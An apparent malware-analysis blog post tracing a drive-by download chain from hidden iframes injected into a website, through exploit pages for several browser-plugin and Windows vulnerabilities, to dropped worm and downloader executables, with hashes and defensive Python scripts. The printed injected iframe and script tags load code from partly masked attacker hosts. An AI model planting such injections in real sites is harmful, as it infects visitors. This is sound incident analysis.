A certain information network site is infected with injected trojans such as Worm.Win32.QQPass

Endurer, original
Version 1

Opening the website, Kaspersky reports:
/---
Detected: Trojan program Trojan-Clicker.HTML.IFrame.dk URL: hxxp://x*X.9***36*5.org/ip/1.htm
Detected: Trojan program Trojan-Clicker.HTML.IFrame.dk URL: hxxp://A*C**C.J*QX*x.org/live/index.htm
---/

Checking the homepage source turns up:
/---
<iframe src="hxxp://x*X.9***36*5.org/ip/1.htm" width=100 height=0></iframe>
<iframe src=hxxp://A*C**C.J*QX*x.org/live/index.htm width=100 height=0></iframe>
<iframe src="hxxp://B*OC*.S*B**B*22.com/home/index.htm" width=20 height=0></iframe>

<iframe src="hxxp://www.gxycd.com.cn/images/xs.htm" width="0" height="0" frameborder="0"></iframe>
---/
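The injected frames above share two tell-tale traits: a zero (or near-zero) width/height and a src that points off-site. The Python script below is an added example, not code from the original post or from any site it names. It parses one page with the standard-library HTMLParser and reports every iframe that is zero-sized, tiny or hosted off-site and every script loaded from another host, resolving relative paths against the page URL (the wm/s223.htm to s321.js hop later in this chain needs exactly that). The sample page and every hostname in it (victim.example, evil-a.example and so on) are constructed placeholders.

```python
"""Hidden-iframe and off-site-script extractor for following a drive-by chain.

Added example; not code from the original post or from any site it names.
It parses one page with the standard-library HTMLParser and reports every
<iframe> that is zero-sized, tiny (both sides <= TINY_PX) or hosted off-site,
and every <script src=...> pulled from another host, with relative paths
resolved against the page URL. The sample page and all hostnames below are
constructed placeholders modelled on the injected code in the analysis.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

TINY_PX = 10  # assumption: frames this small are treated as hidden


def _px(value):
    """Parse a width/height attribute; '000000' -> 0, missing or odd -> None."""
    if value is None:
        return None
    v = value.strip().strip("'\"")
    return int(v) if v.isdigit() else None


def _defang(url):
    """Report URLs with hxxp:// so they are never clicked by accident."""
    return "hxxp://" + url[len("http://"):] if url.startswith("http://") else url


class ChainExtractor(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).netloc.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "").strip().strip("'\"")
        if not src or tag not in ("iframe", "script"):
            return
        # Re-arm defanged hxxp:// only for URL parsing; the report stays defanged.
        absolute = urljoin(self.page_url, src.replace("hxxp://", "http://", 1))
        host = urlparse(absolute).netloc.lower()
        reasons = []
        if tag == "iframe":
            w, h = _px(a.get("width")), _px(a.get("height"))
            if w == 0 or h == 0:
                reasons.append("zero-size")
            elif w is not None and h is not None and w <= TINY_PX and h <= TINY_PX:
                reasons.append("tiny (%dx%d)" % (w, h))
        if host and host != self.page_host:
            reasons.append("off-site host " + host)
        if reasons:
            self.findings.append({"tag": tag, "url": _defang(absolute), "reasons": reasons})


def extract_chain(html, page_url):
    """Return the suspicious iframe/script targets found in one page, in document order."""
    parser = ChainExtractor(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: mimics the injected frames from the analysis with placeholder hosts.
SAMPLE_PAGE = """
<html><body>
<p>Ordinary page text.</p>
<IFRAME src = "hxxp://evil-a.example/ip/1.htm" width = 100 Height = 0> </iframe>
<IFRAME src = hxxp://evil-b.example/live/index.htm width = 100 Height = 0> </iframe>
<IFRAME width = '000000' Height = '000000' src = 'wm/s223.htm'> </iframe>
<iframe src="hxxp://evil-c.example/bala.htm" width=1 height=1></iframe>
<iframe src="/video/player.htm" width=640 height=480></iframe>
<Script language = JavaScript src = s321.js> </SCRIPT>
<script src="hxxp://evil-d.example/EE/E.js"></script>
<script src="/js/site.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for f in extract_chain(SAMPLE_PAGE, "http://victim.example/index.htm"):
        print(f["tag"], f["url"], "; ".join(f["reasons"]))
```

Run against each page in a chain in turn, the findings give the next set of URLs to fetch. Same-host scripts such as s321.js are deliberately not flagged as off-site, so they still need to be pulled and decoded separately, as the analysis does.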

The content of hxxp://x*X.9***36*5.org/ip/1.htm is:
/---
<iframe src="hxxp://web**.2*0**08yi*.com/" width=0 height=0></iframe>
<iframe src="hxxp://web**.2*0**08yi*.com/dyy.htm" width=0 height=0></iframe>
<iframe src="hxxp://A*BC.D*JX**cn.com/abc/index.htm" width=50 height=0></iframe>
---/

The content of hxxp://web**.2*0**08yi*.com is:
/---
<iframe src="hxxp://A*a*.1*8d**d.net/ww/new82.htm" width=0 height=0></iframe>
---/

hxxp://A*a*.1*8d**d.net/ww/new82.htm includes the code:
/---
<iframe width='0' height='0' src='hxxp://A*a*.1*8d**d.net/aa/ki.htm'></iframe>
---/

hxxp://A*a*.1*8d**d.net/aa/ki.htm contains a JavaScript script which, after two rounds of decoding, yields source code whose function is to check for a cookie variable named OK. If it does not exist, the script creates it and writes out the code:
/---
<script src=hxxp://A*a*.1*8d**d.net/aa/1.js></script>
<script src=hxxp://A*a*.1*8d**d.net/aa/B.js></script>
<script src=hxxp://A*a*.1*8d**d.net/aa/pps.js></script>
<iframe width='10' height='10' src='hxxp://A*a*.1*8d**d.net/aa/baofeng.html'></iframe>
---/

These use the Storm (Baofeng) media player vulnerability and the Baidu toolbar control to download hxxp://down.1*8d**d.net/bb/bd.cab.

The content of hxxp://web**.2*0**08yi*.com/dyy.htm is:
/---
<iframe src="hxxp://B**BB.M*m*52*08.com/df.htm" width=0 height=0></iframe>
<iframe src="hxxp://MA*T.J*QX*x*.org/tt.htm" width=0 height=0></iframe>
---/

The content of hxxp://A*C**C.J*QX*x.org/live/index.htm is:
/---
<iframe src="hxxp://web**.2*0**08yi*.com/" width=0 height=0></iframe>
<iframe src="hxxp://web**.2*0**08yi*.com/dyy.htm" width=0 height=0></iframe>
<iframe src="hxxp://A*BC.D*JX**cn.com/abc/index.htm" width=50 height=0></iframe>
---/

The content of hxxp://B*OC*.S*B**B*22.com/home/index.htm is:
/---
<iframe src="hxxp://B*OC*.S*B**B*22.com/" width=0 height=0></iframe>
<iframe src="hxxp://B**BB.M*m*52*08.com/df.htm" width=0 height=0></iframe>
<iframe src="hxxp://MA*T.J*QX*x*.org/tt.htm" width=0 height=0></iframe>
<iframe src="hxxp://A*BC.D*JX**cn.com/abc/index.htm" width=50 height=0></iframe>
---/

The content of hxxp://B*OC*.S*B**B*22.com/ is:
/---
<iframe src="hxxp://A*a*.1*8d**d.net/ww/new82.htm" width=0 height=0></iframe>
---/

The content of hxxp://B**BB.M*m*52*08.com/df.htm is:
/---
<iframe src="hxxp://www.I*P**5*30.com/bala.htm" width=1 height=1></iframe>
---/

hxxp://www.I*P**5*30.com/bala.htm includes the code:
/---
<iframe width='000000' height='000000' src='wm/s223.htm'></iframe>
<iframe width='000000' height='000000' src='wm/du7.htm'></iframe>
<iframe width='000000' height='000000' src='wm/bu5.htm'></iframe>
---/

The content of hxxp://www.I*P**5*30.com/wm/s223.htm is:
/---
<script language=JavaScript src=s321.js></script>
---/

hxxp://www.I*P**5*30.com/wm/s321.js, after two rounds of decoding, yields source code whose function is to use the MS06-014 vulnerability to download hxxp://www.I*P**5*30.com/down.exe and save it to %WINDIR% under a file name defined by the function:
/---
function ygjh2(rgi5d) { var WWW = ""; var oveas3 = Math.random() * rgi5d; /* random number appended to '~tmp' */ return '~tmp' + Math.round(oveas3) + '.exe'; }
---/
which generates ~tmp*****.exe, where ***** is a number; the file is then launched through cmd.exe.

File Description: D:/test/down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 21:50:26
Modification time: 21:50:28
Access time:
Size: 17967 bytes, 17.559 KB
MD5: 33ab065beb165e42a59f6c1a5e4a7e4e
Sha1: eae693be65e601116afb639c66ee9ef1ea625469
CRC32: 8e1e4618

Scanned file: down.exe - infected
down.exe - infected: Worm.Win32.QQPass

hxxp://www.I*P**5*30.com/wm/du7.htm contains a JavaScript script which, after two rounds of decoding, yields source code whose function is to use the Baidu toolbar control (CLSID: {A7F05EE4-0426-454F-8013-C41E3596E9E9}) to download hxxp://*2*6**8i*P**.COM/baidu1.cab.

baidu1.cab contains the same file as down.exe.

hxxp://www.I*P**5*30.com/wm/bu5.htm contains a JavaScript script which, after two rounds of decoding, yields source code that exploits the Storm (Baofeng) media player vulnerability.

hxxp://MA*T.J*QX*x*.org/tt.htm includes the code:
/---
<iframe src="hxxp://E*.J*Open*Q*C*.com/xm1_htm" width=20 height=0></iframe>
---/

hxxp://E*.J*Open*Q*C*.com/xm1_htm includes the code:
/---
<html>
<script src=hxxp://E*.J*Open*Q*C*.com/EE/E.js></script>
</html>
<iframe src="hxxp://E*.J*Open*Q*C*.COM/EE/ee1.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://E*.J*Open*Q*C*.COM/EE/ee2.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://E*.J*Open*Q*C*.COM/EE/ee3.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://E*.J*Open*Q*C*.COM/EE/ee4.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://E*.J*Open*Q*C*.COM/EE/ee5.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://E*.J*Open*Q*C*.COM/EE/ee6.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://E*.J*Open*Q*C*.COM/EE/ee.htm" width="100" height="0" frameborder="0"></iframe>
---/

hxxp://E*.J*Open*Q*C*.com/EE/E.js
Kaspersky reports: Trojan program Trojan-Downloader.JS.Psyme.sf
Its content, decoded once, yields source code whose function is to use the MS06-014 vulnerability to download hxxp://E*.J*Open*Q*C*.com/eeecom.exe and save it to %WINDIR% under a file name defined by the function:
/---
function getran(m)
{
    var numberran = Math.random() * m;
    aihao = '';
    // random number appended to '~temp'
    return '~temp' + Math.round(numberran) + '.tmp';
}
---/
which generates ~temp*****.tmp, where ***** is a number; the file is then launched through cmd.exe.

File Description: D:/test/eeecom.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 14:16:54
Modification time: 14:16:55
Access time: 14:17:17
Size: 20284 bytes, 19.828 KB
MD5: edcd02800c270bcb44956e08b422c9d4
Sha1: cd728c2655e7ba1dc694efb6dbbd3d07033fa5cc
CRC32: 1c0d5f8a
Detected: virus Worm.Win32.Downloader.ag File: D:/test/eeecom.exe/pe_patch/upack

The content of hxxp://E*.J*Open*Q*C*.com/EE/ee1.htm:
/---
<script language=JavaScript src=hxxp://E*.J*Open*Q*C*.com/EE/e2.js></script>
<script language=JavaScript src=hxxp://E*.J*Open*Q*C*.com/EE/e3.js></script>
---/

hxxp://E*.J*Open*Q*C*.com/EE/e2.js is the same as hxxp://E*.J*Open*Q*C*.com/EE/E.js.

hxxp://E*.J*Open*Q*C*.com/EE/ee2.htm, decoded once, yields source code whose function is to use the Baidu toolbar control to download hxxp://E*.J*Open*Q*C*.COM/eeecom.cab.

eeecom.cab contains the files testsign.exe and testsign.ini.

File Description: D:/test/testsign.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 20384 bytes, 19.928 KB
MD5: 509dd358fb4b41aff6def3231bdf6b79
Sha1: dda08a6e095c4501c363fb75f1bb129a54763ed9
CRC32: 53c62eca

Scanned file: testsign.exe - infected
testsign.exe - infected: Worm.Win32.Downloader.w
Rising reports: Backdoor.Win32.Agent.ymv

hxxp://E*.J*Open*Q*C*.com/EE/ee3.htm includes the code:
/---
<script language=JavaScript src=hxxp://E*.J*Open*Q*C*.com/EE/webxl.js></script>
---/

hxxp://E*.J*Open*Q*C*.com/EE/webxl.js, decoded once, yields source code whose function is to use the MS06-014 vulnerability to create the file C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Microsofts.hta, which in turn uses the Thunder (Xunlei) vulnerability to call C:/progra~1/intern~1/iexplore.exe to open hxxp://E*.J*Open*Q*C*.com/EE/webxl.htm, then downloads and executes ysydown1_1cmd.exe.
It contains a variable named qq275756717.

hxxp://E*.J*Open*Q*C*.com/EE/webxl.htm
/---
<script src="hxxp://E*.J*Open*Q*C*.com/eeecom.exe"></script>
---/

hxxp://E*.J*Open*Q*C*.com/eeecom.exe is the same as testsign.exe.

hxxp://E*.J*Open*Q*C*.com/EE/ee4.htm
Kaspersky reports it as Trojan program Trojan-Downloader.VBS.Small.fw
It contains VBScript code which, after two rounds of decoding, yields source code whose function is to use the MS06-014 vulnerability to download hxxp://E*.J*Open*Q*C*.com/eeecom.exe and save it to %WINDIR% under a file name defined by the function:
/---
function gn(rrageyku1) { var orh2 = window["Math"]["random"]() * rrageyku1; /* orh2 is never used, so no number is appended */ return '~tmp' + '.tmp'; }
---/
which generates ~tmp.tmp; the file is then launched through cmd.exe.
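The three name generators in this analysis (ygjh2 in s321.js, getran in E.js and gn here) all drop into %WINDIR% under a '~tmp' or '~temp' prefix, and the analysis lists MD5 hashes and fixed drop names (testsign.exe, oizqdnx.com, wkvxtgu.vbs, uu.exe and others) for the payloads. The Python sweep below is an added example, not code from the original post; it turns those facts into a directory hunt: a regex covering every name the generators can produce (including the buggy number-less ~tmp.tmp), the drop names, and the MD5 values given in the analysis. build_sample_dir() and its placeholder files are constructed for the demonstration and are not the real samples.

```python
"""IoC sweep for the droppers described in the analysis.

Added example, not code from the original post. It combines a hunting regex
derived from the three file-name generators in the analysis with the drop
names and MD5 hashes the analysis lists, and sweeps a directory tree.
build_sample_dir() writes constructed placeholder files so the sweep runs
offline; no real sample is involved.
"""
import hashlib
import os
import re
import tempfile

# MD5 values as published in the analysis (down.exe, eeecom.exe, testsign.exe, abc.exe, svcos.exe).
KNOWN_MD5 = {
    "33ab065beb165e42a59f6c1a5e4a7e4e": "Worm.Win32.QQPass (down.exe)",
    "edcd02800c270bcb44956e08b422c9d4": "Worm.Win32.Downloader.ag (eeecom.exe)",
    "509dd358fb4b41aff6def3231bdf6b79": "Worm.Win32.Downloader.w (testsign.exe)",
    "ef943281ace810485223d61354d32de4": "Worm.Win32.Downloader.w (abc.exe)",
    "7bbf143b15089d0ada39a323429bc7c4": "Trojan-Downloader.Win32.Delf.ctx (svcos.exe)",
}

# Fixed file names the analysis reports the chain writing to disk (lower-case for matching).
DROP_NAMES = {
    "bd.cab", "baidu1.cab", "eeecom.cab", "testsign.exe", "testsign.ini",
    "microsofts.hta", "ysydown1_1cmd.exe", "uu.exe", "test.exe",
    "oizqdnx.com", "wkvxtgu.vbs",
}

# '~tmp' + Math.round(N) + '.exe', '~temp' + N + '.tmp', and the buggy '~tmp' + '.tmp'
# all fall under this one pattern; Windows file names are case-insensitive.
GENERATED_NAME = re.compile(r"^~te?mp\d*\.(exe|tmp)$", re.IGNORECASE)


def md5_of(path):
    """Hash a file in chunks so large files do not have to be read at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def name_reasons(name):
    """Reasons a bare file name is suspicious, independent of its content."""
    reasons = []
    if GENERATED_NAME.match(name):
        reasons.append("name matches ~tmp<N>.exe/.tmp dropper pattern")
    if name.lower() in DROP_NAMES:
        reasons.append("name is a drop file named in the analysis")
    return reasons


def scan_directory(root, known_md5=KNOWN_MD5):
    """Walk root and return {relative path: [reasons]} for every suspicious file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = name_reasons(name)
            label = known_md5.get(md5_of(path))
            if label:
                reasons.append("MD5 matches known sample: " + label)
            if reasons:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return hits


def build_sample_dir():
    """Create a constructed directory tree for the demo; returns (root, known_md5)."""
    root = tempfile.mkdtemp(prefix="ioc_sweep_")
    os.mkdir(os.path.join(root, "system32"))
    sample = b"constructed test sample - not a real binary"
    files = {
        "~tmp4821.exe": b"placeholder",          # ygjh2-style name
        "~TMP.TMP": b"placeholder",              # gn-style name (no number)
        "~temp77.tmp": b"placeholder",           # getran-style name
        "wkvxtgu.vbs": b"placeholder",           # drop name from the analysis
        "notepad.exe": b"benign placeholder",    # should not be flagged
        "system32/svchost.exe": sample,          # flagged by hash only
    }
    for rel, data in files.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as f:
            f.write(data)
    # The demo adds the hash of its own constructed sample to the IoC list.
    known = dict(KNOWN_MD5)
    known[hashlib.md5(sample).hexdigest()] = "constructed test sample"
    return root, known


if __name__ == "__main__":
    root, known = build_sample_dir()
    for rel, reasons in sorted(scan_directory(root, known).items()):
        print(rel, "->", "; ".join(reasons))
```

Pointing scan_directory at %WINDIR%, the user profile and C:\ covers the locations this chain writes to; the name pattern catches a fresh variant even when its hash is not yet known, while the hash list confirms exact matches.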

hxxp://E*.J*Open*Q*C*.com/EE/ee5.htm includes the code:
/---
<script language=JavaScript src=hxxp://E*.J*Open*Q*C*.com/EE/BB.js></script>
---/

hxxp://E*.J*Open*Q*C*.com/EE/BB.js runs the custom function kao_kaspersky() to check for a cookie variable named cookie1. If the cookie variable does not exist, it creates it and writes out the code:
/---
<iframe width=100 height=100 src="hxxp://E*.J*Open*Q*C*.COM/EE//bf.htm/"></iframe>
---/

hxxp://E*.J*Open*Q*C*.com/EE/bf.htm
Kaspersky reports it as malicious program Exploit.JS.Agent.bw

Its content, after two rounds of decoding, yields source code that exploits the Storm (Baofeng) media player vulnerability.

hxxp://E*.J*Open*Q*C*.com/EE/ee6.htm
Kaspersky reports it as Trojan program Trojan-Downloader.JS.Small.hk

Its content is exploit code for the JetAudio 7.x vulnerability. It contains the following information:
/---
JetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07)
Tested on:
- JetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun
---/
The source code, decoded once, has the function of using the Yahoo! Messenger control (CLSID: 24f3ead6-8b87-4c1a-9745071c126bda08f) vulnerability and the EDraw Office Viewer Component 5.2 ActiveX (CLSID: 6ba21c22-53a5-463f-bbe8-5cf7ffa0132b) vulnerability to download hxxp://*60.190.101.206/**/abc.exe, save it as C:/uu.exe and C:/test.exe, and run it.

File Description: D:/test/abc.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 22:48:10
Modification time: 22:48:12
Access time:
Size: 20380 bytes, 19.924 KB
MD5: ef943281ace810485223d61354d32de4
Sha1: 00f5000e139d662c60d5e46bf744d42dfc762d25
CRC32: 5fbde357

Scanned file: abc.exe - infected
abc.exe - infected: Worm.Win32.Downloader.w

Rising reports: D:/test/abc.exe>upack0.39 Backdoor.Win32.Agent.ymv

hxxp://A*BC.D*JX**cn.com/abc/index.htm
Kaspersky reports it as Trojan program Trojan.VBS.Small.ad
Its content includes:
/---
<iframe src=hxxp://A*BC.D*JX**cn.com/abc/xp017.htm width=50 height=0></iframe>
---/
plus a VBScript script which, after two rounds of decoding, yields source code whose function is to use the MS06-014 vulnerability to download hxxp://A*BC.D*JX**cn.com/abc/svcos.exe, save it as oizqdnx.com, and create wkvxtgu.vbs to launch it.

File Description: D:/test/svcos.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:14:48
Modification time: 13:15:38
Access time: 13:16:50
Size: 68096 bytes, 66.512 KB
MD5: 7bbf143b15089d0ada39a323429bc7c4
Sha1: 2b3be95f577af7d22fdba12454e6cff61f021043
CRC32: c534f3f1

Kaspersky reports: Trojan program detected Trojan-Downloader.Win32.Delf.ctx File: D:/test/svcos.exe
Rising: Trojan.Win32.Agent.zri

The content of hxxp://A*BC.D*JX**cn.com/abc/xp017.htm:
/---
<div style="cursor: url(ah.c)"></div>
<script type="text/JScript">function Init() { document.write(""); } window.onload = Init;</script>
---/

hxxp://A*BC.D*JX**cn.com/abc/ah.c downloads hxxp://A*BC.D*JX**cn.com/abc/svcos.exe using the MS07-002/ANI vulnerability.

hxxp://www.g*x*y*C**d.com.cn/images/xs.htm could not be opened.
